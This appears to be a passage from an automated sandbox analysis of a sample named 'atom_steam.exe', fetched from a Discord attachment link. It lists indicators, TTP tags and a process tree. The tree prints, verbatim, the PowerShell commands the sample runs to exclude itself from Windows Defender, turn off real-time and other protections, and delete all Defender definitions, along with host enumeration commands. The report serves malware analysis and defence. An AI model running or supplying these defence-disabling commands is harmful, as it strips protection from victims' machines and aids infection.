Token: SeIncBasePriorityPrivilege	4508	powershell.exe
Token: SeCreatePagefilePrivilege	4508	powershell.exe
Token: SeBackupPrivilege	4508	powershell.exe
Token: SeRestorePrivilege	4508	powershell.exe
Token: SeShutdownPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeSystemEnvironmentPrivilege	4508	powershell.exe
Token: SeRemoteShutdownPrivilege	4508	powershell.exe
Token: SeUndockPrivilege	4508	powershell.exe
Token: SeManageVolumePrivilege	4508	powershell.exe
Token: 33	4508	powershell.exe
Token: 34	4508	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exesteamwebhelper.exe

pid	process
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe

Suspicious use of SendNotifyMessage 47 IoCs

Processes:

msedge.exesteamwebhelper.exe

pid	process
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

SteamSetup.exesteamservice.exesteam.exe

pid process

5724 SteamSetup.exe
5280 steamservice.exe
15880 steam.exe

pid	process
5724	SteamSetup.exe
5280	steamservice.exe
15880	steam.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 5744 wrote to memory of 4968	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 4968	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 5148	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 2028	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 2028	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe
PID 5744 wrote to memory of 3468	5744	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1299809565474422835/1300047698639982665/atom_steam.exe?ex=671f6b45&is=671e19c5&hm=901397100971fbbb6cec69b8a7ec49e8d41db2bc42a32bce050ffd09076ecffe&
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffbbb0f46f8,0x7ffbbb0f4708,0x7ffbbb0f4718
2⤵
PID:4968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
2⤵
PID:5148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
2⤵
PID:3468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
2⤵
PID:4732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
2⤵
PID:5112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
2⤵
PID:5476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
2⤵
PID:716

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 /prefetch:8
2⤵
PID:4472

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
2⤵
PID:5416

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff637905460,0x7ff637905470,0x7ff637905480
3⤵
PID:5020

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6172 /prefetch:8
2⤵
PID:3240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6272 /prefetch:1
2⤵
PID:960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6752 /prefetch:8
2⤵
PID:868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
2⤵
PID:3716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
2⤵
PID:696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4228

C:\Users\Admin\Downloads\atom_steam.exe
"C:\Users\Admin\Downloads\atom_steam.exe"
2⤵
- Executes dropped EXE
PID:4648

C:\Users\Admin\Downloads\atom_steam.exe
"C:\Users\Admin\Downloads\atom_steam.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\atom_steam.exe'"
4⤵
PID:1004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\atom_steam.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
4⤵
PID:4388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5492

C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
5⤵
- Deletes Windows Defender Definitions
PID:5384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ask atom for v2', 0, 'question', 16+16);close()""
4⤵
PID:5828

C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ask atom for v2', 0, 'question', 16+16);close()"
5⤵
PID:5792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:2384

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:1564

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6572 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
2⤵
PID:3388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1252 /prefetch:1
2⤵
PID:2224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
2⤵
PID:6132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1252 /prefetch:1
2⤵
PID:5944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
2⤵
PID:820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
2⤵
PID:4272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3000 /prefetch:1
2⤵
PID:2920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6972 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2256,10587120887161654,10309649887782374516,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3584 /prefetch:8
2⤵
PID:5900

C:\Users\Admin\Downloads\SteamSetup.exe
"C:\Users\Admin\Downloads\SteamSetup.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5724

C:\Program Files (x86)\Steam\bin\steamservice.exe
"C:\Program Files (x86)\Steam\bin\steamservice.exe" /Install
3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5280

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4904

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:824

C:\Program Files (x86)\Steam\steam.exe
"C:\Program Files (x86)\Steam\steam.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5504

C:\Program Files (x86)\Steam\steam.exe
"C:\Program Files (x86)\Steam\steam.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:15880

C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe" "-lang=en_US" "-cachedir=C:\Users\Admin\AppData\Local\Steam\htmlcache" "-steampid=15880" "-buildid=1726604483" "-steamid=0" "-logdir=C:\Program Files (x86)\Steam\logs" "-uimode=7" "-startcount=0" "-userdatadir=C:\Users\Admin\AppData\Local\Steam\cefdata" "-steamuniverse=Public" "-realm=Global" "-clientui=C:\Program Files (x86)\Steam\clientui" "-steampath=C:\Program Files (x86)\Steam\steam.exe" "-launcher=0" --valve-enable-site-isolation --enable-smooth-scrolling --enable-direct-write "--log-file=C:\Program Files (x86)\Steam\logs\cef_log.txt" --disable-quick-menu "--enable-features=PlatformHEVCDecoderSupport" "--disable-features=SpareRendererForSitePerProcess,DcheckIsFatal"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:15932

C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe" --type=crashpad-handler /prefetch:7 --max-uploads=5 --max-db-size=20 --max-db-age=5 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files (x86)\Steam\dumps" "--metrics-dir=C:\Users\Admin\AppData\Local\CEF\User Data" --url=https://crash.steampowered.com/submit --annotation=platform=win64 --annotation=product=cefwebhelper --annotation=version=1726604483 --initial-client-data=0x378,0x37c,0x380,0x348,0x384,0x7ffbac49ee38,0x7ffbac49ee48,0x7ffbac49ee58
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:15968

C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe" --type=gpu-process --user-agent-product="Valve Steam Client" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Steam\cefdata" --buildid=1726604483 --steamid=0 --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --log-file="C:\Program Files (x86)\Steam\logs\cef_log.txt" --mojo-platform-channel-handle=1596 --field-trial-handle=1728,i,13274320445019087890,6621372203164774567,131072 --enable-features=PlatformHEVCDecoderSupport --disable-features=BackForwardCache,DcheckIsFatal,SpareRendererForSitePerProcess,WinUseBrowserSpellChecker /prefetch:2
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:16092

C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
